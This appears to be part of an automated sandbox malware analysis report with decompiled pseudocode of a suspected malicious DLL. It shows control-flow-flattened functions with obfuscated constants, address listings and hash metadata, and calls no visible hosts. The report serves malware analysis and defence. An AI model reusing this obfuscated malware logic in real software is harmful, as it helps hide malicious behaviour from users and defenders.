                                                                                                                                                                            							if(_t370 == 0xc5526f) {
                                                                                                                                                                            								_t370 = 0x696b508;
                                                                                                                                                                            								 *_t401 =  *_t401 & 0x00000000;
                                                                                                                                                                            								_t401[1] = _v100;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t370 == 0x1aa419f) {
                                                                                                                                                                            									E02F60A90(_v64, _v184, _v192,  &_v60, _v172,  *((intOrPtr*)(_t402 + 0xc)));
                                                                                                                                                                            									_t405 =  &(_t405[4]);
                                                                                                                                                                            									_t370 = 0x68c33a9;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									if(_t370 == 0x4c1a8a5) {
                                                                                                                                                                            										_push(_t370);
                                                                                                                                                                            										_push(_t370);
                                                                                                                                                                            										_t352 = E02F5C5D8(_t401[1]);
                                                                                                                                                                            										_t405 =  &(_t405[3]);
                                                                                                                                                                            										 *_t401 = _t352;
                                                                                                                                                                            										__eflags = _t352;
                                                                                                                                                                            										if(__eflags != 0) {
                                                                                                                                                                            											_t370 = 0x8344534;
                                                                                                                                                                            											continue;
                                                                                                                                                                            										}
                                                                                                                                                                            									} else {
                                                                                                                                                                            										if(_t370 == 0x642ef10) {
                                                                                                                                                                            											E02F6CAD5(_v108, _v164, __eflags, _v180, _t402 + 0x4c,  &_v60);
                                                                                                                                                                            											_t405 =  &(_t405[3]);
                                                                                                                                                                            											_t370 = 0x7d262d1;
                                                                                                                                                                            											continue;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											if(_t370 != 0x68c33a9) {
                                                                                                                                                                            												goto L25;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												E02F60A90(_v156, _v188, _v112,  &_v60, _v96,  *((intOrPtr*)(_t402 + 8)));
                                                                                                                                                                            												_t405 =  &(_t405[4]);
                                                                                                                                                                            												_t370 = 0x6a3d126;
                                                                                                                                                                            												continue;
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L26;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t370 - 0x6a3d126;
                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                            						E02F6CAD5(_v68, _v140, __eflags, _v152, _t402 + 0x2c,  &_v60);
                                                                                                                                                                            						_t405 =  &(_t405[3]);
                                                                                                                                                                            						_t370 = 0x2431b15;
                                                                                                                                                                            						goto L25;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						__eflags = _t370 - 0x7d262d1;
                                                                                                                                                                            						if(_t370 == 0x7d262d1) {
                                                                                                                                                                            							E02F60A90(_v76, _v160, _v84,  &_v60, _v144,  *((intOrPtr*)(_t402 + 0x58)));
                                                                                                                                                                            							_t405 =  &(_t405[4]);
                                                                                                                                                                            							_t370 = 0xabb5672;
                                                                                                                                                                            							goto L1;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							__eflags = _t370 - 0x8344534;
                                                                                                                                                                            							if(_t370 == 0x8344534) {
                                                                                                                                                                            								E02F522A6(_t401, _v92,  &_v60, _v116);
                                                                                                                                                                            								_t405 =  &(_t405[2]);
                                                                                                                                                                            								_t370 = 0x642ef10;
                                                                                                                                                                            								goto L1;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								__eflags = _t370 - 0x94f1f5a;
                                                                                                                                                                            								if(_t370 == 0x94f1f5a) {
                                                                                                                                                                            									E02F60A90(_v124, _v132, _v104,  &_v60, _v168,  *((intOrPtr*)(_t402 + 0x38)));
                                                                                                                                                                            									_t405 =  &(_t405[4]);
                                                                                                                                                                            									_t370 = 0x1aa419f;
                                                                                                                                                                            									goto L1;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									__eflags = _t370 - 0xabb5672;
                                                                                                                                                                            									if(_t370 != 0xabb5672) {
                                                                                                                                                                            										goto L25;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										E02F60A90(_v120, _v148, _v128,  &_v60, _v176,  *((intOrPtr*)(_t402 + 0x10)));
                                                                                                                                                                            										_t405 =  &(_t405[4]);
                                                                                                                                                                            										_t370 = 0x94f1f5a;
                                                                                                                                                                            										goto L1;
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					break;
                                                                                                                                                                            					L25:
                                                                                                                                                                            					__eflags = _t370 - 0x2431b15;
                                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                                            				L26:
                                                                                                                                                                            				__eflags =  *_t401;
                                                                                                                                                                            				_t313 =  *_t401 != 0;
                                                                                                                                                                            				__eflags = _t313;
                                                                                                                                                                            				return 0 | _t313;
                                                                                                                                                                            			}

















































                                                                                                                                                                            0x02f577ac
                                                                                                                                                                            0x02f577b4
                                                                                                                                                                            0x02f577b5
                                                                                                                                                                            0x02f577bc
                                                                                                                                                                            0x02f577be
                                                                                                                                                                            0x02f577c6
                                                                                                                                                                            0x02f577c7
                                                                                                                                                                            0x02f577cc
                                                                                                                                                                            0x02f577d7
                                                                                                                                                                            0x02f577da
                                                                                                                                                                            0x02f577e8
                                                                                                                                                                            0x02f577ef
                                                                                                                                                                            0x02f577f4
                                                                                                                                                                            0x02f577fa
                                                                                                                                                                            0x02f57802
                                                                                                                                                                            0x02f5780d
                                                                                                                                                                            0x02f57818
                                                                                                                                                                            0x02f57823
                                                                                                                                                                            0x02f5782e
                                                                                                                                                                            0x02f57836
                                                                                                                                                                            0x02f57841
                                                                                                                                                                            0x02f57849
                                                                                                                                                                            0x02f5784e
                                                                                                                                                                            0x02f57851
                                                                                                                                                                            0x02f57855
                                                                                                                                                                            0x02f5785d
                                                                                                                                                                            0x02f57865
                                                                                                                                                                            0x02f5786d
                                                                                                                                                                            0x02f57875
                                                                                                                                                                            0x02f5787d
                                                                                                                                                                            0x02f57885
                                                                                                                                                                            0x02f57889
                                                                                                                                                                            0x02f5788d
                                                                                                                                                                            0x02f57895
                                                                                                                                                                            0x02f5789d
                                                                                                                                                                            0x02f578a5
                                                                                                                                                                            0x02f578aa
                                                                                                                                                                            0x02f578b2
                                                                                                                                                                            0x02f578ba
                                                                                                                                                                            0x02f578c2
                                                                                                                                                                            0x02f578ca
                                                                                                                                                                            0x02f578d2
                                                                                                                                                                            0x02f578da
                                                                                                                                                                            0x02f578e2
                                                                                                                                                                            0x02f578ec
                                                                                                                                                                            0x02f578f0
                                                                                                                                                                            0x02f578f8
                                                                                                                                                                            0x02f57908
                                                                                                                                                                            0x02f5790c
                                                                                                                                                                            0x02f57914
                                                                                                                                                                            0x02f5791c
                                                                                                                                                                            0x02f57924
                                                                                                                                                                            0x02f5792f
                                                                                                                                                                            0x02f5793a
                                                                                                                                                                            0x02f57945
                                                                                                                                                                            0x02f57951
                                                                                                                                                                            0x02f57954
                                                                                                                                                                            0x02f57958
                                                                                                                                                                            0x02f57965
                                                                                                                                                                            0x02f57969
                                                                                                                                                                            0x02f57971
                                                                                                                                                                            0x02f57979
                                                                                                                                                                            0x02f5797e
                                                                                                                                                                            0x02f57988
                                                                                                                                                                            0x02f57990
                                                                                                                                                                            0x02f57995
                                                                                                                                                                            0x02f5799d
                                                                                                                                                                            0x02f579a5
                                                                                                                                                                            0x02f579ad
                                                                                                                                                                            0x02f579b5
                                                                                                                                                                            0x02f579bd
                                                                                                                                                                            0x02f579c5
                                                                                                                                                                            0x02f579cd
                                                                                                                                                                            0x02f579d5
                                                                                                                                                                            0x02f579dd
                                                                                                                                                                            0x02f579e5
                                                                                                                                                                            0x02f579ed
                                                                                                                                                                            0x02f579f2
                                                                                                                                                                            0x02f579fa
                                                                                                                                                                            0x02f57a02
                                                                                                                                                                            0x02f57a0a
                                                                                                                                                                            0x02f57a0f
                                                                                                                                                                            0x02f57a17
                                                                                                                                                                            0x02f57a1c
                                                                                                                                                                            0x02f57a24
                                                                                                                                                                            0x02f57a2c
                                                                                                                                                                            0x02f57a34
                                                                                                                                                                            0x02f57a3c
                                                                                                                                                                            0x02f57a44
                                                                                                                                                                            0x02f57a4c
                                                                                                                                                                            0x02f57a5b
                                                                                                                                                                            0x02f57a5e
                                                                                                                                                                            0x02f57a62
                                                                                                                                                                            0x02f57a6a
                                                                                                                                                                            0x02f57a72
                                                                                                                                                                            0x02f57a77
                                                                                                                                                                            0x02f57a7f
                                                                                                                                                                            0x02f57a87
                                                                                                                                                                            0x02f57a8f
                                                                                                                                                                            0x02f57a94
                                                                                                                                                                            0x02f57a9e
                                                                                                                                                                            0x02f57aa2
                                                                                                                                                                            0x02f57aaa
                                                                                                                                                                            0x02f57ab5
                                                                                                                                                                            0x02f57ac0
                                                                                                                                                                            0x02f57acb
                                                                                                                                                                            0x02f57ad3
                                                                                                                                                                            0x02f57adb
                                                                                                                                                                            0x02f57ae3
                                                                                                                                                                            0x02f57ae8
                                                                                                                                                                            0x02f57af0
                                                                                                                                                                            0x02f57af8
                                                                                                                                                                            0x02f57b00
                                                                                                                                                                            0x02f57b0d
                                                                                                                                                                            0x02f57b11
                                                                                                                                                                            0x02f57b19
                                                                                                                                                                            0x02f57b21
                                                                                                                                                                            0x02f57b26
                                                                                                                                                                            0x02f57b2e
                                                                                                                                                                            0x02f57b36
                                                                                                                                                                            0x02f57b3e
                                                                                                                                                                            0x02f57b46
                                                                                                                                                                            0x02f57b4b
                                                                                                                                                                            0x02f57b50
                                                                                                                                                                            0x02f57b55
                                                                                                                                                                            0x02f57b5d
                                                                                                                                                                            0x02f57b65
                                                                                                                                                                            0x02f57b71
                                                                                                                                                                            0x02f57b74
                                                                                                                                                                            0x02f57b78
                                                                                                                                                                            0x02f57b80
                                                                                                                                                                            0x02f57b88
                                                                                                                                                                            0x02f57b95
                                                                                                                                                                            0x02f57b9b
                                                                                                                                                                            0x02f57ba8
                                                                                                                                                                            0x02f57bb0
                                                                                                                                                                            0x02f57bb8
                                                                                                                                                                            0x02f57bc0
                                                                                                                                                                            0x02f57bcb
                                                                                                                                                                            0x02f57bd6
                                                                                                                                                                            0x02f57be1
                                                                                                                                                                            0x02f57bef
                                                                                                                                                                            0x02f57bf7
                                                                                                                                                                            0x02f57bfb
                                                                                                                                                                            0x02f57c03
                                                                                                                                                                            0x02f57c0b
                                                                                                                                                                            0x02f57c13
                                                                                                                                                                            0x02f57c1b
                                                                                                                                                                            0x02f57c23
                                                                                                                                                                            0x02f57c2b
                                                                                                                                                                            0x02f57c2b
                                                                                                                                                                            0x02f57c33
                                                                                                                                                                            0x02f57c33
                                                                                                                                                                            0x02f57c33
                                                                                                                                                                            0x02f57c33
                                                                                                                                                                            0x02f57c35
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f57c3b
                                                                                                                                                                            0x02f57d45
                                                                                                                                                                            0x02f57d48
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f57c41
                                                                                                                                                                            0x02f57c47
                                                                                                                                                                            0x02f57d31
                                                                                                                                                                            0x02f57d33
                                                                                                                                                                            0x02f57d36
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f57c4d
                                                                                                                                                                            0x02f57c53
                                                                                                                                                                            0x02f57d1b
                                                                                                                                                                            0x02f57d20
                                                                                                                                                                            0x02f57d23
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f57c59
                                                                                                                                                                            0x02f57c5f
                                                                                                                                                                            0x02f57cdf
                                                                                                                                                                            0x02f57ce0
                                                                                                                                                                            0x02f57ce4
                                                                                                                                                                            0x02f57ce9
                                                                                                                                                                            0x02f57cec
                                                                                                                                                                            0x02f57cee
                                                                                                                                                                            0x02f57cf0
                                                                                                                                                                            0x02f57cf6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f57cf6
                                                                                                                                                                            0x02f57c61
                                                                                                                                                                            0x02f57c67
                                                                                                                                                                            0x02f57cb7
                                                                                                                                                                            0x02f57cbc
                                                                                                                                                                            0x02f57cbf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f57c69
                                                                                                                                                                            0x02f57c6f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f57c75
                                                                                                                                                                            0x02f57c90
                                                                                                                                                                            0x02f57c95
                                                                                                                                                                            0x02f57c98
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f57c98
                                                                                                                                                                            0x02f57c6f
                                                                                                                                                                            0x02f57c67
                                                                                                                                                                            0x02f57c5f
                                                                                                                                                                            0x02f57c53
                                                                                                                                                                            0x02f57c47
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f57c3b
                                                                                                                                                                            0x02f57d52
                                                                                                                                                                            0x02f57d58
                                                                                                                                                                            0x02f57e4e
                                                                                                                                                                            0x02f57e53
                                                                                                                                                                            0x02f57e56
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f57d5e
                                                                                                                                                                            0x02f57d5e
                                                                                                                                                                            0x02f57d64
                                                                                                                                                                            0x02f57e21
                                                                                                                                                                            0x02f57e26
                                                                                                                                                                            0x02f57e29
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f57d6a
                                                                                                                                                                            0x02f57d6a
                                                                                                                                                                            0x02f57d6c
                                                                                                                                                                            0x02f57dee
                                                                                                                                                                            0x02f57df3
                                                                                                                                                                            0x02f57df6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f57d6e
                                                                                                                                                                            0x02f57d6e
                                                                                                                                                                            0x02f57d74
                                                                                                                                                                            0x02f57dca
                                                                                                                                                                            0x02f57dcf
                                                                                                                                                                            0x02f57dd2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f57d76
                                                                                                                                                                            0x02f57d76
                                                                                                                                                                            0x02f57d7c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f57d82
                                                                                                                                                                            0x02f57d9d
                                                                                                                                                                            0x02f57da2
                                                                                                                                                                            0x02f57da5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f57da5
                                                                                                                                                                            0x02f57d7c
                                                                                                                                                                            0x02f57d74
                                                                                                                                                                            0x02f57d6c
                                                                                                                                                                            0x02f57d64
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f57e5b
                                                                                                                                                                            0x02f57e5b
                                                                                                                                                                            0x02f57e5b
                                                                                                                                                                            0x02f57e67
                                                                                                                                                                            0x02f57e69
                                                                                                                                                                            0x02f57e6e
                                                                                                                                                                            0x02f57e6e
                                                                                                                                                                            0x02f57e78

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: )uL$*$0i^$4-,a$sG'$&$[}
                                                                                                                                                                            • API String ID: 0-4036371101
                                                                                                                                                                            • Opcode ID: e280074acee194a8a4af21785d26579025f4db8ac7bfb2e7628ff9284e72021d
                                                                                                                                                                            • Instruction ID: 7d3a9873dd57beb2512274d0507365bd8c64de51b2d5bf87a693ec8533839050
                                                                                                                                                                            • Opcode Fuzzy Hash: e280074acee194a8a4af21785d26579025f4db8ac7bfb2e7628ff9284e72021d
                                                                                                                                                                            • Instruction Fuzzy Hash: 45F133B1508384DFD368CF21C489A6BFBF2FB94348F50891DE69A86260D7B59949CF43
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                            			E02F56B7A(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                            				char _v76;
                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                            				char _v84;
                                                                                                                                                                            				intOrPtr _v88;
                                                                                                                                                                            				intOrPtr _v92;
                                                                                                                                                                            				intOrPtr _v96;
                                                                                                                                                                            				intOrPtr _v100;
                                                                                                                                                                            				char _v108;
                                                                                                                                                                            				signed int _v112;
                                                                                                                                                                            				char _v116;
                                                                                                                                                                            				signed int _v120;
                                                                                                                                                                            				signed int _v124;
                                                                                                                                                                            				signed int _v128;
                                                                                                                                                                            				signed int _v132;
                                                                                                                                                                            				signed int _v136;
                                                                                                                                                                            				signed int _v140;
                                                                                                                                                                            				signed int _v144;
                                                                                                                                                                            				signed int _v148;
                                                                                                                                                                            				signed int _v152;
                                                                                                                                                                            				signed int _v156;
                                                                                                                                                                            				signed int _v160;
                                                                                                                                                                            				signed int _v164;
                                                                                                                                                                            				signed int _v168;
                                                                                                                                                                            				signed int _v172;
                                                                                                                                                                            				signed int _v176;
                                                                                                                                                                            				signed int _v180;
                                                                                                                                                                            				signed int _v184;
                                                                                                                                                                            				signed int _v188;
                                                                                                                                                                            				signed int _v192;
                                                                                                                                                                            				signed int _v196;
                                                                                                                                                                            				signed int _v200;
                                                                                                                                                                            				signed int _v204;
                                                                                                                                                                            				signed int _v208;
                                                                                                                                                                            				void* _t242;
                                                                                                                                                                            				void* _t265;
                                                                                                                                                                            				void* _t269;
                                                                                                                                                                            				signed int _t271;
                                                                                                                                                                            				signed int _t272;
                                                                                                                                                                            				char* _t274;
                                                                                                                                                                            				signed int _t275;
                                                                                                                                                                            				intOrPtr _t282;
                                                                                                                                                                            				intOrPtr* _t285;
                                                                                                                                                                            				void* _t287;
                                                                                                                                                                            				signed int _t292;
                                                                                                                                                                            				intOrPtr _t298;
                                                                                                                                                                            				intOrPtr _t324;
                                                                                                                                                                            				intOrPtr* _t326;
                                                                                                                                                                            				signed int _t327;
                                                                                                                                                                            				signed int _t328;
                                                                                                                                                                            				signed int _t329;
                                                                                                                                                                            				signed int _t330;
                                                                                                                                                                            				signed int _t331;
                                                                                                                                                                            				signed int _t332;
                                                                                                                                                                            				signed int _t333;
                                                                                                                                                                            				signed int _t334;
                                                                                                                                                                            				void* _t336;
                                                                                                                                                                            				void* _t337;
                                                                                                                                                                            
                                                                                                                                                                            				_t285 = _a8;
                                                                                                                                                                            				_push(_t285);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_t326 = __edx;
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t242);
                                                                                                                                                                            				_v100 = 0x757930;
                                                                                                                                                                            				_t337 = _t336 + 0x10;
                                                                                                                                                                            				_v96 = 0xd80ad;
                                                                                                                                                                            				_t324 = 0;
                                                                                                                                                                            				_v92 = 0x3caa7;
                                                                                                                                                                            				_v88 = 0;
                                                                                                                                                                            				_t287 = 0x43d278a;
                                                                                                                                                                            				_v140 = 0xa476d3;
                                                                                                                                                                            				_v140 = _v140 + 0x8b71;
                                                                                                                                                                            				_v140 = _v140 ^ 0x00a50244;
                                                                                                                                                                            				_v192 = 0x86f1c9;
                                                                                                                                                                            				_v192 = _v192 | 0xd7b81b76;
                                                                                                                                                                            				_t327 = 0x1d;
                                                                                                                                                                            				_v192 = _v192 / _t327;
                                                                                                                                                                            				_v192 = _v192 + 0xffff13d4;
                                                                                                                                                                            				_v192 = _v192 ^ 0x076f980a;
                                                                                                                                                                            				_v188 = 0x843aad;
                                                                                                                                                                            				_v188 = _v188 << 0x10;
                                                                                                                                                                            				_v188 = _v188 | 0xc1fad14f;
                                                                                                                                                                            				_t328 = 0x74;
                                                                                                                                                                            				_v188 = _v188 * 0x5b;
                                                                                                                                                                            				_v188 = _v188 ^ 0x93eb17e1;
                                                                                                                                                                            				_v168 = 0x8317bb;
                                                                                                                                                                            				_v168 = _v168 ^ 0x1362ec48;
                                                                                                                                                                            				_v168 = _v168 ^ 0x4008a55c;
                                                                                                                                                                            				_v168 = _v168 ^ 0x53e7b525;
                                                                                                                                                                            				_v144 = 0x20a76b;
                                                                                                                                                                            				_v144 = _v144 / _t328;
                                                                                                                                                                            				_v144 = _v144 ^ 0x000a47fb;
                                                                                                                                                                            				_v196 = 0xe0aa92;
                                                                                                                                                                            				_v196 = _v196 ^ 0x05a4f46c;
                                                                                                                                                                            				_t329 = 0x24;
                                                                                                                                                                            				_v196 = _v196 / _t329;
                                                                                                                                                                            				_v196 = _v196 << 8;
                                                                                                                                                                            				_v196 = _v196 ^ 0x257ea781;
                                                                                                                                                                            				_v200 = 0xe588c5;
                                                                                                                                                                            				_t330 = 0x29;
                                                                                                                                                                            				_v200 = _v200 / _t330;
                                                                                                                                                                            				_v200 = _v200 >> 6;
                                                                                                                                                                            				_v200 = _v200 >> 0x10;
                                                                                                                                                                            				_v200 = _v200 ^ 0x000d5940;
                                                                                                                                                                            				_v164 = 0x4155a9;
                                                                                                                                                                            				_v164 = _v164 >> 5;
                                                                                                                                                                            				_v164 = _v164 | 0x5ba52662;
                                                                                                                                                                            				_v164 = _v164 ^ 0x5ba55520;
                                                                                                                                                                            				_v160 = 0x4466c5;
                                                                                                                                                                            				_v160 = _v160 >> 9;
                                                                                                                                                                            				_v160 = _v160 >> 3;
                                                                                                                                                                            				_v160 = _v160 ^ 0x000d6457;
                                                                                                                                                                            				_v148 = 0x35624e;
                                                                                                                                                                            				_v148 = _v148 >> 0x10;
                                                                                                                                                                            				_v148 = _v148 ^ 0x000abf08;
                                                                                                                                                                            				_v172 = 0x5696ab;
                                                                                                                                                                            				_v172 = _v172 + 0xe488;
                                                                                                                                                                            				_v172 = _v172 + 0x10cb;
                                                                                                                                                                            				_v172 = _v172 ^ 0x0055d7ec;
                                                                                                                                                                            				_v128 = 0xad635c;
                                                                                                                                                                            				_v128 = _v128 ^ 0xb55b0f96;
                                                                                                                                                                            				_v128 = _v128 ^ 0xb5f22a9b;
                                                                                                                                                                            				_v208 = 0x275835;
                                                                                                                                                                            				_t108 =  &_v208; // 0x275835
                                                                                                                                                                            				_t331 = 0x37;
                                                                                                                                                                            				_push("true");
                                                                                                                                                                            				_v208 =  *_t108 / _t331;
                                                                                                                                                                            				_v208 = _v208 ^ 0xb04b577b;
                                                                                                                                                                            				_pop(_t332);
                                                                                                                                                                            				_v208 = _v208 / _t332;
                                                                                                                                                                            				_v208 = _v208 ^ 0x055d5c1c;
                                                                                                                                                                            				_v132 = 0x1cc441;
                                                                                                                                                                            				_t333 = 0x6a;
                                                                                                                                                                            				_v132 = _v132 / _t333;
                                                                                                                                                                            				_v132 = _v132 ^ 0x000e83d7;
                                                                                                                                                                            				_v204 = 0x125b67;
                                                                                                                                                                            				_v204 = _v204 >> 5;
                                                                                                                                                                            				_v204 = _v204 ^ 0xe127959b;
                                                                                                                                                                            				_v204 = _v204 << 0x10;
                                                                                                                                                                            				_v204 = _v204 ^ 0x07419ea5;
                                                                                                                                                                            				_v180 = 0x68abbe;
                                                                                                                                                                            				_v180 = _v180 | 0x57b8f8fa;
                                                                                                                                                                            				_v180 = _v180 << 0xf;
                                                                                                                                                                            				_v180 = _v180 ^ 0x7df5736a;
                                                                                                                                                                            				_v156 = 0x6240f4;
                                                                                                                                                                            				_v156 = _v156 + 0xffffe0b8;
                                                                                                                                                                            				_t334 = 0x69;
                                                                                                                                                                            				_v156 = _v156 * 0x13;
                                                                                                                                                                            				_v156 = _v156 ^ 0x0741ad16;
                                                                                                                                                                            				_v124 = 0xa95440;
                                                                                                                                                                            				_v124 = _v124 / _t334;
                                                                                                                                                                            				_v124 = _v124 ^ 0x00021dd5;
                                                                                                                                                                            				_v176 = 0x6e61ec;
                                                                                                                                                                            				_v176 = _v176 + 0x7ec3;
                                                                                                                                                                            				_v176 = _v176 | 0x8e41022f;
                                                                                                                                                                            				_v176 = _v176 ^ 0x8e60c50b;
                                                                                                                                                                            				_v120 = 0x9285fa;
                                                                                                                                                                            				_v120 = _v120 ^ 0x677ff2d5;
                                                                                                                                                                            				_v120 = _v120 ^ 0x67e9a1bb;
                                                                                                                                                                            				_v152 = 0x5286f5;
                                                                                                                                                                            				_v152 = _v152 + 0xffff3b7a;
                                                                                                                                                                            				_v152 = _v152 ^ 0x016928ba;
                                                                                                                                                                            				_v152 = _v152 ^ 0x013cf174;
                                                                                                                                                                            				_v184 = 0xd65a61;
                                                                                                                                                                            				_v184 = _v184 * 0x45;
                                                                                                                                                                            				_v184 = _v184 + 0xffff6116;
                                                                                                                                                                            				_v184 = _v184 ^ 0x39cc51e9;
                                                                                                                                                                            				_v136 = 0xa284b3;
                                                                                                                                                                            				_v136 = _v136 + 0x4b38;
                                                                                                                                                                            				_v136 = _v136 ^ 0x00a4fd93;
                                                                                                                                                                            				while(_t287 != 0x1b81945) {
                                                                                                                                                                            					if(_t287 == 0x314f545) {
                                                                                                                                                                            						_t265 = E02F746BD(_v188,  &_v108, _v168, _v144, _v196,  &_v116);
                                                                                                                                                                            						_t337 = _t337 + 0x10;
                                                                                                                                                                            						if(_t265 == 0) {
                                                                                                                                                                            							L25:
                                                                                                                                                                            							return _t324;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t287 = 0x958f9d6;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t287 == 0x43d278a) {
                                                                                                                                                                            						_t287 = 0xee3ea02;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t287 == 0x55d8418) {
                                                                                                                                                                            						_t292 = _v172;
                                                                                                                                                                            						_t269 = E02F707AA(_t292, _v128,  &_v84, _v208,  &_v76);
                                                                                                                                                                            						_t337 = _t337 + 0xc;
                                                                                                                                                                            						if(_t269 != 0) {
                                                                                                                                                                            							_push(_t292);
                                                                                                                                                                            							_push(_t292);
                                                                                                                                                                            							_t282 = E02F5C5D8(_v80);
                                                                                                                                                                            							_t337 = _t337 + 0xc;
                                                                                                                                                                            							 *_t326 = _t282;
                                                                                                                                                                            							if(_t282 != 0) {
                                                                                                                                                                            								E02F6C9B0(_v124,  *_t326, _v176, _v80, _v84, _v120);
                                                                                                                                                                            								_t337 = _t337 + 0x10;
                                                                                                                                                                            								 *((intOrPtr*)(_t326 + 4)) = _v80;
                                                                                                                                                                            								_t324 = 1;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						_t287 = 0x1b81945;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t287 == 0x958f9d6) {
                                                                                                                                                                            						_t271 = E02F5C473( &_v108, _v200, _v164, _v160, _v148,  &_v84);
                                                                                                                                                                            						_t337 = _t337 + 0x10;
                                                                                                                                                                            						asm("sbb ecx, ecx");
                                                                                                                                                                            						_t287 = ( ~_t271 & 0x03a56ad3) + 0x1b81945;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t287 != 0xee3ea02) {
                                                                                                                                                                            						L24:
                                                                                                                                                                            						if(_t287 != 0x1eefa0b) {
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L25;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t272 =  *((intOrPtr*)(_t285 + 4));
                                                                                                                                                                            					_t298 =  *_t285;
                                                                                                                                                                            					_v112 = _t272;
                                                                                                                                                                            					_v116 = _t298;
                                                                                                                                                                            					_t274 = _t272 - 1 + _t298;
                                                                                                                                                                            					while(_t274 > _t298) {
                                                                                                                                                                            						if( *_t274 == 0) {
                                                                                                                                                                            							break;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t274 = _t274 - 1;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t275 = _t274 - _t298;
                                                                                                                                                                            					_v112 = _t275;
                                                                                                                                                                            					if(_t275 == 0) {
                                                                                                                                                                            						L14:
                                                                                                                                                                            						_t287 = 0x314f545;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					while(_v112 % _v192 != _v140) {
                                                                                                                                                                            						_t207 =  &_v112;
                                                                                                                                                                            						 *_t207 = _v112 - 1;
                                                                                                                                                                            						if( *_t207 != 0) {
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L14;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L14;
                                                                                                                                                                            				}
                                                                                                                                                                            				E02F72B09(_v152, _v108, _v184, _v136);
                                                                                                                                                                            				_t287 = 0x1eefa0b;
                                                                                                                                                                            				goto L24;
                                                                                                                                                                            			}




























































                                                                                                                                                                            0x02f56b81
                                                                                                                                                                            0x02f56b8b
                                                                                                                                                                            0x02f56b8c
                                                                                                                                                                            0x02f56b93
                                                                                                                                                                            0x02f56b95
                                                                                                                                                                            0x02f56b96
                                                                                                                                                                            0x02f56b97
                                                                                                                                                                            0x02f56b9c
                                                                                                                                                                            0x02f56ba7
                                                                                                                                                                            0x02f56baa
                                                                                                                                                                            0x02f56bb5
                                                                                                                                                                            0x02f56bb7
                                                                                                                                                                            0x02f56bc4
                                                                                                                                                                            0x02f56bcb
                                                                                                                                                                            0x02f56bd0
                                                                                                                                                                            0x02f56bd8
                                                                                                                                                                            0x02f56be0
                                                                                                                                                                            0x02f56be8
                                                                                                                                                                            0x02f56bf0
                                                                                                                                                                            0x02f56bfe
                                                                                                                                                                            0x02f56c03
                                                                                                                                                                            0x02f56c09
                                                                                                                                                                            0x02f56c11
                                                                                                                                                                            0x02f56c19
                                                                                                                                                                            0x02f56c21
                                                                                                                                                                            0x02f56c26
                                                                                                                                                                            0x02f56c33
